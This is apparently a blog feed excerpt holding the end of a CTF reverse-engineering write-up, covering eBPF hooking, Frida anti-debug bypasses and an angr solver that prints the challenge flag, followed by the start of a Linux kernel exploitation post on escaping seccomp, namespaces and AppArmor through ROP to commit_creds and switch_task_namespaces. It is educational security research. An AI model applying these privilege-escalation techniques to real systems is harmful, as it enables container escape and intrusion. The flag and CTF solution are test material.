  <span class="c1">// 0:  e9 fb ff ff ff          jmp    0x0</span>
  <span class="k">if</span><span class="p">(</span><span class="n">bpf_probe_write_user</span><span class="p">(</span><span class="n">ip</span><span class="p">,</span> <span class="s">"</span><span class="se">\xE9\xFB\xFF\xFF\xFF</span><span class="s">"</span><span class="p">,</span> <span class="mi">5</span><span class="p">))</span> <span class="p">{</span>
    <span class="n">bpf_printk</span><span class="p">(</span><span class="s">"error: bpf_probe_write_user</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
    <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
  <span class="p">}</span>

  <span class="n">bpf_printk</span><span class="p">(</span><span class="s">"success: hooked return address</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>

  <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>
<p>Executing the binary with the BPF program loaded lead to some surprising results (those are the logs of three distinct runs).</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>hexalinux.bin-5416    [004] ...21 10744.055618: bpf_trace_printk: IP: 0x7f08d2da3034
hexalinux.bin-5416    [004] ...21 10744.055622: bpf_trace_printk: error: bpf_probe_write_user
hexalinux.bin-5418    [009] ...21 10749.195558: bpf_trace_printk: IP: 0x7fd507691034
hexalinux.bin-5418    [009] ...21 10749.195561: bpf_trace_printk: error: bpf_probe_write_user
hexalinux.bin-5420    [004] ...21 10749.614267: bpf_trace_printk: IP: 0x7f4b510b8034
hexalinux.bin-5420    [004] ...21 10749.614270: bpf_trace_printk: error: bpf_probe_write_user
</code></pre></div></div>
<p>First, the code that makes the syscall is not writable (and thus probably not shellcode, because why bother marking SC NX?). Second, its address changes on each run. Third, the address is pretty large. Replacing the write with sending a SIGSTOP, i.e., <code class="language-plaintext highlighter-rouge">bpf_send_signal(SIGSTOP)</code>, indeed trapped the child, which was doing the write, in an endless loop. I think this is because the signal causes the write to be aborted, and a notification is sent to the parent, which then resumes the child, which in turn restarts the syscall. However, I have not read the relevant kernel code paths, so this is just a guess.</p>

<p>We can now inspect the child’s mappings, and voila, there is a second stage program loaded at <code class="language-plaintext highlighter-rouge">0x800000000</code>, a dynamic loader, and even a libc.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>% cat /proc/5523/maps
00200000-00204000 rwxp 00000000 fe:00 3716342                            /home/archie/ctf/hex23/gecko/hexalinux.bin
00a03000-00a08000 rw-p 00003000 fe:00 3716342                            /home/archie/ctf/hex23/gecko/hexalinux.bin
026f4000-02715000 rw-p 00000000 00:00 0                                  [heap]
800000000-800001000 r--p 00000000 00:00 0
800001000-800003000 r-xp 00000000 00:00 0
800003000-800005000 r--p 00000000 00:00 0
800005000-800006000 rw-p 00000000 00:00 0
b00000000-b00001000 r--p 00000000 fe:00 2362658                          /usr/lib/ld-linux-x86-64.so.2
b00001000-b00027000 r-xp 00001000 fe:00 2362658                          /usr/lib/ld-linux-x86-64.so.2
b00027000-b00031000 r--p 00027000 fe:00 2362658                          /usr/lib/ld-linux-x86-64.so.2
b00031000-b00033000 r--p 00031000 fe:00 2362658                          /usr/lib/ld-linux-x86-64.so.2
b00033000-b00035000 rw-p 00033000 fe:00 2362658                          /usr/lib/ld-linux-x86-64.so.2
7f335122c000-7f335122e000 rw-p 00000000 00:00 0
7f335122e000-7f3351254000 r--p 00000000 fe:00 2362697                    /usr/lib/libc.so.6
7f3351254000-7f33513ae000 r-xp 00026000 fe:00 2362697                    /usr/lib/libc.so.6
7f33513ae000-7f3351402000 r--p 00180000 fe:00 2362697                    /usr/lib/libc.so.6
7f3351402000-7f3351406000 r--p 001d3000 fe:00 2362697                    /usr/lib/libc.so.6
7f3351406000-7f3351408000 rw-p 001d7000 fe:00 2362697                    /usr/lib/libc.so.6
7f3351408000-7f3351412000 rw-p 00000000 00:00 0
7fff5b6de000-7fff5b6ff000 rw-p 00000000 00:00 0                          [stack]
7fff5b79c000-7fff5b7a0000 r--p 00000000 00:00 0                          [vvar]
7fff5b7a0000-7fff5b7a2000 r-xp 00000000 00:00 0                          [vdso]
ffffffffff600000-ffffffffff601000 --xp 00000000 00:00 0                  [vsyscall]
</code></pre></div></div>
<p>Seems like either the parent or the child unpacked a second stage in the child’s address space, mapped my system’s dynamic linker and then jumped right into its entry point, instructing it to load the second stage - essentially a user-land exec, neat. The <code class="language-plaintext highlighter-rouge">write</code> syscall was thus made using standard libc functions, not shellcode.</p>

<p><a href="https://github.com/vobst/ctf_hxn23_binary_gecko_stage_1_linux/blob/master/memdump.py">Dumping</a> the second stage yields something that <code class="language-plaintext highlighter-rouge">readelf</code> can understand and my disassembler can load, great.</p>

<p>However, before starting to reverse the second stage I wanted to coerce the dynamic linker into loading <a href="https://frida.re/docs/gadget/">frida-gadget</a> for me. That way I could at least do some dynamic analysis to speed up the process (Since the child gets debugged, using gdb is not an option). Since the child sanitizes its stack before it is traced by the parent, it should be possible to use gdb to skip the check and detach afterwards. To check that I could get constructor code execution, and to verify my conjecture that the dynamic linker was indeed tasked to load the second stage, I wrote a small library that checks the <a href="https://man7.org/linux/man-pages/man3/getauxval.3.html">auxiliary vector</a> in its constructor, and indeed, it was set up to point at the second stage’s entry point.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">#include</span> <span class="cpf">&lt;stdio.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;sys/auxv.h&gt;</span><span class="cp">
</span>
<span class="n">__attribute__</span><span class="p">((</span><span class="n">constructor</span><span class="p">))</span>
<span class="kt">void</span> <span class="nf">init</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span>
<span class="p">{</span>
  <span class="n">puts</span><span class="p">(</span><span class="s">"Hello World"</span><span class="p">);</span>
  <span class="n">printf</span><span class="p">(</span><span class="s">"Client base at 0x%lx</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">getauxval</span><span class="p">(</span><span class="n">AT_ENTRY</span><span class="p">));</span>
  <span class="n">getchar</span><span class="p">();</span>
<span class="p">}</span>
<span class="c1">// Hello World</span>
<span class="c1">// Client base at 0x800001120</span>
</code></pre></div></div>
<p>Reversing the second stage is interesting as it is written under the assumption that it is being debugged by the parent. Thus, it is not surprising that its first instruction is a breakpoint. Again, there are no symbols in this binary, but this time all function calls are made through function pointers, even the call to <code class="language-plaintext highlighter-rouge">__libc_start_main</code> at the entry point.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>800001120  int64_t _start(int64_t arg1, int64_t arg2, int64_t arg3) __noreturn

800001120  90                 nop       // was int3
800001121  0f1efa             nop     edx, edi
800001124  31ed               xor     ebp, ebp  {0x0}
800001126  4989d1             mov     r9, rdx
800001129  5e                 pop     rsi {__return_addr}
80000112a  4889e2             mov     rdx, rsp {arg_8}
80000112d  4883e4f0           and     rsp, 0xfffffffffffffff0
800001131  50                 push    rax {var_8}
800001132  54                 push    rsp {var_8} {var_10}
800001133  4c8d05160f0000     lea     r8, [rel data_800002050]
80000113a  488d0d9f0e0000     lea     rcx, [rel data_800001fe0]
800001141  488d3dc1000000     lea     rdi, [rel main]
800001148  ff15923e0000       call    qword [rel fp___libc_start_main]
</code></pre></div></div>
<p>Probably those function pointers are being resolved by the parent, at least the binary did not contain any relocation information that would have allowed the dynamic linker to do so. Using <code class="language-plaintext highlighter-rouge">frida</code> it was easy to dump the function pointer table and to convert the addresses back to libc symbols.</p>
<div class="language-js highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nx">Interceptor</span><span class="p">.</span><span class="nx">attach</span><span class="p">(</span><span class="nx">Module</span><span class="p">.</span><span class="nx">findExportByName</span><span class="p">(</span><span class="kc">null</span><span class="p">,</span> <span class="dl">"</span><span class="s2">write</span><span class="dl">"</span><span class="p">),</span> <span class="p">{</span>
  <span class="nx">onEnter</span><span class="p">(</span><span class="nx">args</span><span class="p">)</span> <span class="p">{</span>
    <span class="kd">var</span> <span class="nx">vars</span> <span class="o">=</span> <span class="nx">ptr</span><span class="p">(</span><span class="dl">"</span><span class="s2">0x800004f98</span><span class="dl">"</span><span class="p">);</span> <span class="c1">// function pointers start here</span>

    <span class="k">for</span> <span class="p">(</span><span class="kd">let</span> <span class="nx">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="nx">i</span> <span class="o">&lt;</span> <span class="mi">13</span><span class="p">;</span> <span class="nx">i</span><span class="o">++</span><span class="p">,</span> <span class="nx">vars</span> <span class="o">=</span> <span class="nx">vars</span><span class="p">.</span><span class="nx">add</span><span class="p">(</span><span class="mi">8</span><span class="p">))</span> <span class="p">{</span>
      <span class="kd">let</span> <span class="nx">addr</span> <span class="o">=</span> <span class="nx">vars</span><span class="p">.</span><span class="nx">readPointer</span><span class="p">();</span>
      <span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="s2">`</span><span class="p">${</span><span class="nx">vars</span><span class="p">}</span><span class="s2">: </span><span class="p">${</span><span class="nx">addr</span><span class="p">}</span><span class="s2">`</span><span class="p">);</span>
      <span class="k">if</span> <span class="p">(</span><span class="nx">addr</span> <span class="o">!=</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
        <span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="dl">"</span><span class="s2"> -</span><span class="dl">"</span><span class="p">,</span> <span class="nx">DebugSymbol</span><span class="p">.</span><span class="nx">fromAddress</span><span class="p">(</span><span class="nx">addr</span><span class="p">));</span>
      <span class="p">}</span>
    <span class="p">}</span>
  <span class="p">},</span>
<span class="p">});</span>
</code></pre></div></div>
<p>However, for some weird reason a few of the function pointers did not correspond to exported libc symbols. Checking the corresponding libc offsets lead to some pretty awful-looking functions, luckily, cross-references outed them as some sort of simd versions of <code class="language-plaintext highlighter-rouge">strlen</code> and <code class="language-plaintext highlighter-rouge">strcpy</code>. This, and (the fact that the resolved addresses were already present in dumps that were taken while the program was stuck in my library’s constructor) lead me to question my earlier assumption that the parent was responsible for resolving the addresses, but I didn’t investigate this issue further, time is money.</p>

<p>Anyway, figuring out the symbol issue is not at all useful for solving the challenge, which turned out to be a standard crackme with the key being the correct flag.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>800001209  int64_t main() __noreturn

800001209      // was int3
800001237      // PTRACE_TRACEME
800001237      if (ptrace(req: 0, pid: 0, addr: 1, data: nullptr) == -1)
800001240          puts(str: "Get out!!")
800001254      else
800001254          void* rax_3 = malloc(n: 0x64)
800001262          void* rax_4 = malloc(n: 0x64)
800001277          printf(fmt: "give me The correct flag: ")
80000128f          scanf(fmt: &amp;fmt_%s, rax_3)
8000012a4          if (strlen(s: rax_3) != 0x3d)
8000012ad              puts(str: "NOOOO R3V3RS3R!")
8000012bb          if (*rax_3 != 0x46)  // F
800001342              label_800001342:
800001342              puts(str: "NOOOO R3V3RS3R!")
8000012ca          else  // L
8000012ca              if (*(rax_3 + 1) != 0x4c)
8000012ca                  goto label_800001342
8000012d9              if (*(rax_3 + 2) != 0x41)  // A
8000012d9                  goto label_800001342
8000012e8              if (*(rax_3 + 3) != 0x47)  // G
8000012e8                  goto label_800001342
8000012f7              if (*(rax_3 + 4) != 0x7b)  // {
8000012f7                  goto label_800001342
800001300              puts(str: "you are getting somewhere!")
800001326              strncpy(dst: rax_4, src: rax_3 + 5, n: strlen(s: rax_3))
800001334              if (*rax_4 != 0x44)  // D
800001fce                  label_800001fce:
800001fce                  puts(str: "NOOOO R3V3RS3R!")
8000013a8              else // the heavy checks come here
8000013a8                  char rdx_8 = *(rax_4 + 3) ^ *(rax_4 + 5) ^ *(rax_4 + 0xb) ^ *(rax_4 + 0xf) ^ *(rax_4 + 0x14) ^ *(rax_4 + 0x16) ^ *(rax_4 + 0x1a)
8000013dc                  if (sx.d(*(rax_4 + 0x2d) ^ rdx_8 ^ *(rax_4 + 0x24)) == zx.d(*(rax_4 + 0x32) == 0x6c))
8000013dc                      goto label_800001fce
800001401                  if (sx.d(*rax_4) - sx.d(*(rax_4 + 3)) != 0xfffffffb)
800001401                      goto label_800001fce
[continues for quite a bit ...]
</code></pre></div></div>
<p>Interestingly, the child was issuing a second “trace me” request to go down the familiar “Get out!” path. As the child is already being traced there is no easy way to make this request succeed (I guess even if I could get the parent to exit while keeping the child alive, <code class="language-plaintext highlighter-rouge">systemd</code>, who would become the new parent, would not be expecting the request.) Anyway, <code class="language-plaintext highlighter-rouge">frida</code> can solve that for us.</p>
<div class="language-js highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nx">Interceptor</span><span class="p">.</span><span class="nx">attach</span><span class="p">(</span><span class="nx">Module</span><span class="p">.</span><span class="nx">findExportByName</span><span class="p">(</span><span class="kc">null</span><span class="p">,</span> <span class="dl">"</span><span class="s2">ptrace</span><span class="dl">"</span><span class="p">),</span> <span class="p">{</span>
  <span class="nx">onLeave</span><span class="p">(</span><span class="nx">ret</span><span class="p">)</span> <span class="p">{</span>
    <span class="nx">ret</span><span class="p">.</span><span class="nx">replace</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span>
  <span class="p">},</span>
<span class="p">})</span>
</code></pre></div></div>
<p>It’s obvious that those constraints don’t want to be solved by hand, and thus I fried up <code class="language-plaintext highlighter-rouge">angr</code> to solve them for me. However, <code class="language-plaintext highlighter-rouge">cle</code>’s default backend uses <code class="language-plaintext highlighter-rouge">pyelftools</code>, which was throwing an exception due to a dynamic tag in a binary without a string table (or something along those lines). Whatever, I already knew that binaryninja was working fine and thus used the experimental binja backend of <code class="language-plaintext highlighter-rouge">cle</code>. From here on it is really just a few lines of code to solve the challenge.</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="nn">angr</span>
<span class="kn">import</span> <span class="nn">cle</span>
<span class="kn">from</span> <span class="nn">cle.backends.binja</span> <span class="kn">import</span> <span class="n">BinjaBin</span>

<span class="c1"># use binja as default loader throws exception
</span><span class="n">b</span> <span class="o">=</span> <span class="n">BinjaBin</span><span class="p">(</span>
    <span class="s">"8251_anonymous_dump_0x800000000.bin"</span><span class="p">,</span>
    <span class="nb">open</span><span class="p">(</span><span class="s">"8251_anonymous_dump_0x800000000.bin"</span><span class="p">,</span> <span class="s">"rb"</span><span class="p">),</span>
<span class="p">)</span>

<span class="n">l</span> <span class="o">=</span> <span class="n">cle</span><span class="p">.</span><span class="n">Loader</span><span class="p">(</span><span class="n">b</span><span class="p">)</span>

<span class="n">p</span> <span class="o">=</span> <span class="n">angr</span><span class="p">.</span><span class="n">Project</span><span class="p">(</span><span class="n">l</span><span class="p">)</span>

<span class="c1"># start of heavy checks
</span><span class="n">s</span> <span class="o">=</span> <span class="n">p</span><span class="p">.</span><span class="n">factory</span><span class="p">.</span><span class="n">blank_state</span><span class="p">(</span><span class="n">addr</span><span class="o">=</span><span class="mh">0x1351</span><span class="p">)</span>

<span class="c1"># [rbp - 8] is ptr to our data +5
</span><span class="n">s</span><span class="p">.</span><span class="n">regs</span><span class="p">.</span><span class="n">rbp</span> <span class="o">=</span> <span class="mh">0x10000</span>
<span class="n">s</span><span class="p">.</span><span class="n">mem</span><span class="p">[</span><span class="n">s</span><span class="p">.</span><span class="n">regs</span><span class="p">.</span><span class="n">rbp</span> <span class="o">-</span> <span class="mi">8</span><span class="p">].</span><span class="n">uint64_t</span> <span class="o">=</span> <span class="mh">0x11000</span>
<span class="n">s</span><span class="p">.</span><span class="n">mem</span><span class="p">[</span><span class="mh">0x11000</span><span class="p">].</span><span class="n">uint8_t</span> <span class="o">=</span> <span class="mh">0x44</span>

<span class="c1"># flag should be printable ascii
</span><span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="mh">0x38</span><span class="p">):</span>
    <span class="n">b</span> <span class="o">=</span> <span class="n">s</span><span class="p">.</span><span class="n">memory</span><span class="p">.</span><span class="n">load</span><span class="p">(</span><span class="mh">0x11000</span> <span class="o">+</span> <span class="n">i</span><span class="p">,</span> <span class="mi">1</span><span class="p">)</span>
    <span class="n">s</span><span class="p">.</span><span class="n">add_constraints</span><span class="p">(</span><span class="n">b</span> <span class="o">&lt;</span> <span class="mh">0x7f</span><span class="p">,</span> <span class="n">b</span> <span class="o">&gt;=</span> <span class="mh">0x20</span><span class="p">)</span>

<span class="n">sm</span> <span class="o">=</span> <span class="n">p</span><span class="p">.</span><span class="n">factory</span><span class="p">.</span><span class="n">simulation_manager</span><span class="p">(</span><span class="n">s</span><span class="p">)</span>

<span class="n">sm</span><span class="p">.</span><span class="n">explore</span><span class="p">(</span><span class="n">find</span> <span class="o">=</span> <span class="mh">0x1fb4</span><span class="p">,</span> <span class="n">avoid</span><span class="o">=</span><span class="p">[</span><span class="mh">0x1fc7</span><span class="p">])</span>
<span class="n">ss</span> <span class="o">=</span> <span class="n">sm</span><span class="p">.</span><span class="n">found</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span>

<span class="n">flag</span> <span class="o">=</span> <span class="p">[</span><span class="s">"F"</span><span class="p">,</span> <span class="s">"L"</span><span class="p">,</span> <span class="s">"A"</span><span class="p">,</span> <span class="s">"G"</span><span class="p">,</span> <span class="s">"{"</span><span class="p">]</span>
<span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mh">0x64</span><span class="p">):</span>
    <span class="n">c</span> <span class="o">=</span> <span class="nb">chr</span><span class="p">(</span><span class="n">ss</span><span class="p">.</span><span class="n">mem</span><span class="p">[</span><span class="mh">0x11000</span> <span class="o">+</span> <span class="n">i</span><span class="p">].</span><span class="n">uint8_t</span><span class="p">.</span><span class="n">concrete</span><span class="p">)</span>
    <span class="n">flag</span><span class="p">.</span><span class="n">append</span><span class="p">(</span><span class="n">c</span><span class="p">)</span>
<span class="k">print</span><span class="p">(</span><span class="s">""</span><span class="p">.</span><span class="n">join</span><span class="p">(</span><span class="n">flag</span><span class="p">))</span> <span class="c1"># FLAG{DC_I_0h1nk_y0u_mad3_4_B1G_mil3sUPn3_R3V3@S3d_K33p_G01ng}
</span></code></pre></div></div>
<p>Finally, what remains is to validate the flag against the actual binary to make sure that we don’t submit a wrong result.</p>

<h2 id="conclusion">Conclusion</h2>

<p>I’m not doing many reversing challenges and thus this binary had a lot it could teach me. Having designed some challenges myself I can really appreciate the amount of work that must have gone into creating such a handcrafted payload.</p>

<p>Looking back at my solution process, it seems like I spent too much time reversing the binary in a top-down approach. I could maybe have switched to the bottom-up approach, i.e., starting at the <code class="language-plaintext highlighter-rouge">write</code> syscall, a bit earlier. Anyway, I needed at least some of the top-down knowledge to be able to run <code class="language-plaintext highlighter-rouge">frida</code> and to dump the child process. On the other hand, I avoided going down the rabbit hole of reversing the unpacking process statically and in detail.</p>

<p>I’d actually be interested in seeing other solution approaches, but I doubt that there will be many writeups for such a small CTF.</p>]]></content><author><name></name></author><summary type="html"><![CDATA[This year’s Hexacon featured several CTFs hosted by some of the sponsoring companies. This post is a brief writeup of my solution for the stage-one Linux challenge by Binary Gecko, a “[…] provider of comprehensive and specialized cybersecurity solutions to businesses and institutions of all sizes.”, aha.]]></summary></entry><entry><title type="html">Linux S1E3: With IP Control or Arbitrary Read-Write to Root</title><link href="https://blog.eb9f.de/2023/08/12/Linux-S1-E3.html" rel="alternate" type="text/html" title="Linux S1E3: With IP Control or Arbitrary Read-Write to Root" /><published>2023-08-12T00:00:00+00:00</published><updated>2023-08-12T00:00:00+00:00</updated><id>https://blog.eb9f.de/2023/08/12/Linux-S1-E3</id><content type="html" xml:base="https://blog.eb9f.de/2023/08/12/Linux-S1-E3.html"><![CDATA[<p>_Note: This is the third post in a series on Linux heap exploitation. It assumes that you have read the first [<a href="https://blog.eb9f.de/2023/07/20/Linux-S1-E1.html">0</a>] and second part [<a href="https://blog.eb9f.de/2023/08/05/Linux-S1-E2.html">1</a>]. You can experiment with the exploit [<a href="https://github.com/vobst/ctf-corjail-public">2</a>] yourself using the kernel debugging setup [<a href="https://github.com/vobst/like-dbg-fork-public">3</a>] that was published alongside this series.</p>

<p>We concluded the previous post with a code execution and a read-write primitive. Now, it is time to discuss how to use those primitives for privilege escalation to finally obtain the flag. To that end, we will start by looking into the implementation of various process isolation mechanisms, with the goal of learning how to disable them through ROP or arbitrary read-write.</p>

<p><img src="/media/Linux-S3/roadmap_3.jpg" alt="" /></p>

<h2 id="process-isolation">Process Isolation</h2>
<p>In Linux, there is no shortage of ways to limit what a process can do. The most basic ones, like users, groups, and capabilities are assumed to be familiar to the reader. In the following, we will have a look at a couple of perhaps less-known mechanisms. However, be warned that there is more than that, for example, we will not discuss <code class="language-plaintext highlighter-rouge">cgroups</code> at all.</p>

<h3 id="seccomp">Seccomp</h3>
<p>Restricting the set of system calls that a process may issue, or arguments thereof, is a useful way to implement kernel attack surface reduction as well as the principle of least privilege. A process can use the <a href="https://man7.org/linux/man-pages/man2/seccomp.2.html"><code class="language-plaintext highlighter-rouge">seccomp</code></a> system call to operate on its secure computing state. Most notably, it can specify a set of programs, called filters, for the kernel’s BPF virtual machine that are run on each subsequent system call before the kernel invokes the actual syscall handler. Those programs receive the syscall number, arguments, and user-mode instruction pointer as input, and may indicate their decision via the return value [<a href="https://elixir.bootlin.com/linux/v5.10.127/source/kernel/seccomp.c#L942">5</a>]. Actions range from simply allowing or denying the syscall to complex operations like delegating the decision to a supervisor process.</p>

<p>Whether or not a process is subjected to syscall filtering when entering the kernel is decided by the <code class="language-plaintext highlighter-rouge">TIF_SECCOMP</code> bit in the <code class="language-plaintext highlighter-rouge">flags</code> of its <a href="https://elixir.bootlin.com/linux/v5.10.127/source/arch/x86/include/asm/thread_info.h#L56"><code class="language-plaintext highlighter-rouge">thread_info</code></a> structure, which is embedded into the <code class="language-plaintext highlighter-rouge">task_struct</code> [<a href="https://elixir.bootlin.com/linux/v5.10.127/source/kernel/entry/common.c#L57">6</a>]. The same mechanism is also used to, for example, notify a debugger of system calls a traced process performs. Regarding exploitation, this implies that we can disable seccomp enforcement by simply flipping a bit in the <code class="language-plaintext highlighter-rouge">task_struct</code>.</p>

<p>Container runtimes like Docker run processes under a seccomp filter by default [<a href="https://docs.docker.com/engine/security/seccomp/">7</a>]. However, our CTF challenge is using a custom seccomp profile [<a href="https://github.com/Crusaders-of-Rust/corCTF-2022-public-challenge-archive/blob/master/pwn/corjail/task/chall/seccomp.json">8</a>]. It enables a few system calls blocked by the default profile, like <code class="language-plaintext highlighter-rouge">keyctl</code> and <code class="language-plaintext highlighter-rouge">add_key</code>, which we already made good use of. On the other hand, it is more restrictive in other areas, e.g., it blocks <a href="https://man7.org/linux/man-pages/man7/io_uring.7.html">io-uring</a> and <a href="https://man7.org/linux/man-pages/man7/sysvipc.7.html">System V message queue</a> related system calls. While the former is probably a precautionary attack surface reduction due to the plethora of security vulnerabilities sprawling out of this subsystem [<a href="https://security.googleblog.com/2023/06/learnings-from-kctf-vrps-42-linux.html">9</a>], the latter is clearly targeted at preventing us from using the exploitation techniques evolving around the kernel objects of these syscalls [<a href="https://www.willsroot.io/2021/08/corctf-2021-fire-of-salvation-writeup.html">10</a>] [<a href="https://www.willsroot.io/2022/01/cve-2022-0185.html">11</a>] [<a href="https://syst3mfailure.io/wall-of-perdition/">12</a>] [<a href="https://a13xp0p0v.github.io/2021/02/09/CVE-2021-26708.html">13</a>].</p>

<p>Furthermore, both profiles block the <a href="https://man7.org/linux/man-pages/man2/setns.2.html"><code class="language-plaintext highlighter-rouge">setns</code></a> system call, albeit in slightly different ways, that allows a process to change its <em>namespace</em> association, which makes for a smooth transition to our next topic.</p>

<h3 id="namespaces">Namespaces</h3>
<p>Namespaces are an abstraction that is wrapped around some global system resources, like filesystem mounts, process IDs, or the system time. For each such resource, every process is part of an instance of a namespace wrapping that resource. This can be used to give different sets of processes the illusion of exclusive access to a resource. You can inspect the namespaces of a process by listing the files in the <code class="language-plaintext highlighter-rouge">/proc/&lt;pid&gt;/ns</code> directory. Each file in this directory links directly to the kernel object representing the namespace instance the process is part of. There is one file for each type of namespace [<a href="https://lwn.net/Articles/531114/">14</a>].</p>

<p>Most namespaces have a tree-like structure, and during exploitation, we oftentimes want to change the namespace association of our process to the root namespaces that all others are derived from. In my limited experience, the semantics of namespaces have plenty of intricacies and so does their implementation. Thus, there is ample opportunity for creating weird, unstable system states when performing the wrong set of manipulations during the exploit.</p>

<p>Among public exploits, the agreed-upon strategy seems to be to perform a weird, incomplete, and unstable switch of all (but the user) namespaces of the init task in the exploit process’ PID namespace. ROP exploits perform this step through <code class="language-plaintext highlighter-rouge">switch_task_namespaces(find_task_by_vpid(1), &amp;init_nsproxy)</code>. What this does is make the root namespace objects available to our process under <code class="language-plaintext highlighter-rouge">/proc/1/ns</code>. Afterwards, we can use the <code class="language-plaintext highlighter-rouge">setns</code> system call with those files to let the kernel perform a more thorough switch of our own namespaces. Switching back to the root user namespace happens as a side effect of the call to <code class="language-plaintext highlighter-rouge">commit_creds(prepare_kernel_cred(0))</code> found in those exploits, which also grants full capabilities in this namespace [<a href="https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html">15</a>] [<a href="https://www.cyberark.com/resources/threat-research-blog/the-route-to-root-container-escape-using-kernel-exploitation">16</a>].</p>

<p>Interestingly, Docker is by default <em>not</em> running processes in separate user namespaces, which implies that a switch of namespaces is not necessary [<a href="https://docs.docker.com/engine/security/userns-remap/">17</a>]. However, even if it would that would require only minimal modifications to our exploit.</p>

<h3 id="linux-security-modules-lsm">Linux Security Modules (LSM)</h3>
<p>Even after disabling seccomp and switching back to the root namespaces with a full set of capabilities, you might still find yourself receiving permission denied errors on some operations. This might be because an LSM is imposing mandatory access control policies on your process.</p>

<p>For example, Docker is by default using AppArmor, mostly to restrict a process’ access to files in procfs and sysfs [<a href="https://docs.docker.com/engine/security/apparmor/">18</a>] [<a href="https://github.com/moby/moby/blob/master/profiles/apparmor/template.go">19</a>]. This might lead to unexpected failures of some exploitation techniques that artificially create Time of Check to Time of Use issues to write to those files, the global versions of which are mounted read-only into the container [<a href="https://starlabs.sg/blog/2023/07-a-new-method-for-container-escape-using-file-based-dirtycred/">20</a>].</p>

<p><em>Homework: Use the privilege escalation experimentation setup described below to disable AppArmor.</em></p>

<h2 id="privilege-escalation">Privilege Escalation</h2>
<p>Before starting to develop the final stage of our exploit, it should be clear where we start from and what it is that we want to achieve.</p>

<p>We already know that our process is running under the challenge’s custom seccomp filter as well as the default Docker AppArmor profile. Furthermore, we can look up that, by default, Docker runs processes in new cgroup, ipc, mnt, net, pid, and uts namespaces. Finally, even though we are part of the root user namespace, we are an unprivileged user without any additional capabilities.</p>

<p>On the other hand, the goal is to read a file in the home directory of the root user, i.e., <code class="language-plaintext highlighter-rouge">/root</code>. Here, absolute filesystem paths are of course with respect to the filesystem root of the root mount namespace, which we are not part of.</p>

<h3 id="development-setup">Development Setup</h3>
<p>I already hinted at the fact that scribbling around in internal kernel structures or hijacking kernel control flow is likely to cause instability or outright crashes when getting things wrong. As those steps usually come pretty late in the exploit flow, it is customary to develop them in isolation, especially if earlier stages of the exploit might fail with some non-negligible probably [<a href="https://www.offensivecon.org/speakers/2023/alex-plaskett-and-cedric-halbronn.html">21</a>].</p>

<p>The setup I used to facilitate easier development of those later stages consists of a user space program [<a href="https://github.com/vobst/ctf-corjail-public/blob/master/test_privesc.c">22</a>] that issues an uncommon system call, and a gdb script [<a href="https://github.com/vobst/like-dbg-fork-public/blob/master/io/scripts/gdb_script_test_privesc.py">23</a>] that waits for it and simulates the privilege escalation. Before the user space program issues the system call it fills CPU registers with flags and other values that function as parameters to the gdb script. For example, one set of parameters might cause the script to write a ROP chain into memory and set the thread up to execute it, while another one might cause it to overwrite the task’s seccomp status.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ ./build/test_privesc
Usage: ./build/test_privesc [options] -- program [arg...]
Options can be:
   -c  Update credentials
   -m  Update fs context
   -p  Update pid namespace
   -s  Disable seccomp
   -u  Update mount namespace
   -r  Trigger ROP chain
   -f  Fork before exec
   -n  Do setns(/proc/?/ns)
</code></pre></div></div>
<p>While this allows for convenient, vulnerability-independent development of those later stages in Python, there are some shortcomings, especially for ROP exploits. For instance, depending on the context that they hijack control flow in, it might be necessary to drop certain locks before returning to user space, or even to terminate a kernel thread in case the exploit takes control in a non-process context [<a href="https://www.offensivecon.org/speakers/2020/alexander-popov.html">24</a>]. In those cases, it might be necessary to simulate a situation more accurately with a vulnerability-dependent script.</p>

<p><img src="/media/Linux-S3/test_privesc.jpg" alt="" /></p>

<h3 id="rop-chain">ROP Chain</h3>
<p>Once an attacker has gained a code execution primitive, there are ample ways in which they might elevate their privileges. However, if the exploit context does not demand a more specialized approach, the go-to method of public exploits is to call <a href="https://elixir.bootlin.com/linux/v5.10.127/source/kernel/cred.c#L437"><code class="language-plaintext highlighter-rouge">commit_creds</code></a>(<a href="https://elixir.bootlin.com/linux/v5.10.127/source/kernel/cred.c#L682"><code class="language-plaintext highlighter-rouge">prepare_kernel_cred</code></a>(0)) to become the root user in the root namespace, and <a href="https://elixir.bootlin.com/linux/v5.10.127/source/kernel/nsproxy.c#L242"><code class="language-plaintext highlighter-rouge">switch_task_namespaces</code></a>(<a href="https://elixir.bootlin.com/linux/v5.10.127/source/kernel/pid.c#L420"><code class="language-plaintext highlighter-rouge">find_task_by_vpid</code></a>(1), <code class="language-plaintext highlighter-rouge">&amp;init_nsproxy</code>) to make the remaining root namespaces available to <code class="language-plaintext highlighter-rouge">setns</code> via procfs. To disable seccomp, which currently prevents us from using the <code class="language-plaintext highlighter-rouge">setns</code> system call, we can clear all our thread info flags. 